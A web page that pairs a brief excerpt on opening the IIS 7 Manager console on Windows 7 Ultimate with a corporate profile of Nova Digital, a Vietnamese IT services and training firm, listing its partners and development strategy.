You can open the Internet Information Services (IIS) Manager console by following the below path.

iis-7-management-console-path

Open “Control Panel > System and Security > Administrative Tools” then click on Internet Information Services (IIS 7) Manager icon to open the IIS 7 management console.

Here is the Windows7 Ultimate IIS 7 about section.

The RTM build of Windows 7 Ultimate edition is shipped with Internet Information Services version 7.5.7600.16385

windows-7-ultimate-iis7-version-number

I hope you have now an idea on how to install IIS 7 on Windows 7 Ultimate edition. Actually the IIS 7 install process is straight forward and not much different than installing IIS 7 on Windows Vista. Actually the IIS installation is done from the Add Remove Windows Components tool since IIS early versions like IIS 5 and IIS 6 versions.

I believe web developers and IIS administrators installed IIS before will not face difficulty installing IIS 7 on Windows 7.

Trích dẫn từ nguồn:  http://www.kodyaz.com/articles/how-to-install-iis7-on-windows-7.aspx

STRATEGIC PARTNERS OF NOVA DIGITAL


 

Technology partner

image

Microsoft Small Business Specialist
– Partners Office 365 service deployment for College, University and Enterprise
Partner specializing in the implementation and training of SharePoint Portal Solutions, BizTalk, SQL, Lync and
Office Online

 

image

 

Solution Service IT Professional
Partner specializing in deploying virtualization solutions vCenter & vCloud enterprise network for the College, University and
Enterprise

image

Solution Service NAS Professional

 Partner specializing in deploying intranet storage solutions and cloud computing to LAN NAS & vCloud for College, University and Enterprise.

image

Service Provider SERVER & SAN Professional

Partner specializing in deploying solutions for Server & SAN Servers for College, University and Enterprise

image

– Partner consulting and implementing software system solution services Customs declaration “E-Manifest Vietnam Customs “.

– Partner consulting and deploying Content Management System number Television Telecom Viettel Media

image

Partner consulting and deploying software products of Financial Management enterprise customers ERP.

image

Partner consulting and deploying Content number Television Management System news VTC Media 

Partner consulting and deploying virtualized infrastructure in IT Training VTC Labs Management.

image

Partner consulting and deploying System Management Services Virtualization Cloud Computing vCloud CMC IDC HCMC.

Vanguard enterprises in the IT Training

image

 

image

1.      ROBUSTA GLOBAL Technology & Training

www.robusta.vn

2.      IPMAC

3.      IT Academic Thang Long

4.      NetPro IT Academic.

5.      IT Center of Hanoi Business and Technology  University

6.      Institute of IT & Telecom training – Hanoi Open University.

7.      Technology Training Institute graduate – Hanoi University of Technology.

8.      IT Academy – National Economics.

9.      Hue Industrial College.

10.  Nhat Nghe

Business and Media Content Partner

 

 

image

VASEP

http://www.vasep.com.vn

For 14 years is Partner consulting and implementation support capacity building in ICT Business Association Vietnam seafood (VASEP)

 

 

image

VISTAS

http://www.vitas.org.vn

4 years is Partner consulting  and building deployment, training and professional management capability offices in Vietnam Tea Association (VITAS)

image

Vietfores

http://www.vietfores.org 

14 years as a consulting partner and technical support Enterprise IT in production and processing of wood furniture under the Vietnam Association of Wood

 

FUTURE DEVELOPMENT

Our commitment

          Quality of service is the guideline for all our activities so that we are always focused to satisfy customer requirements with the spirit of dedicated service and deep understanding of the needs outlined. Improve technology competencies and quality assurance for better products and services.

          Along with we constantly improving our technology capabilities and quality process improvement to provide products and services with the best quality.

          Sincerely, active in building partnerships for mutual development.

          Internal unity, striving for education career advancement.

          Reinvestment society through community education activities.

Development strategy

          Invest on new technology to keep moving forward with strategic technology partner.

          Improving partner relationship for better business opportunities.

          Build a trusted relationship with traditional customers.

          Enhance training activities, technology transfer with others corporate partners.

          Human development strategy based on profound humanity philosophy.

          Become a leading company in providing training service and technology solution in APAC.

%d bloggers like this: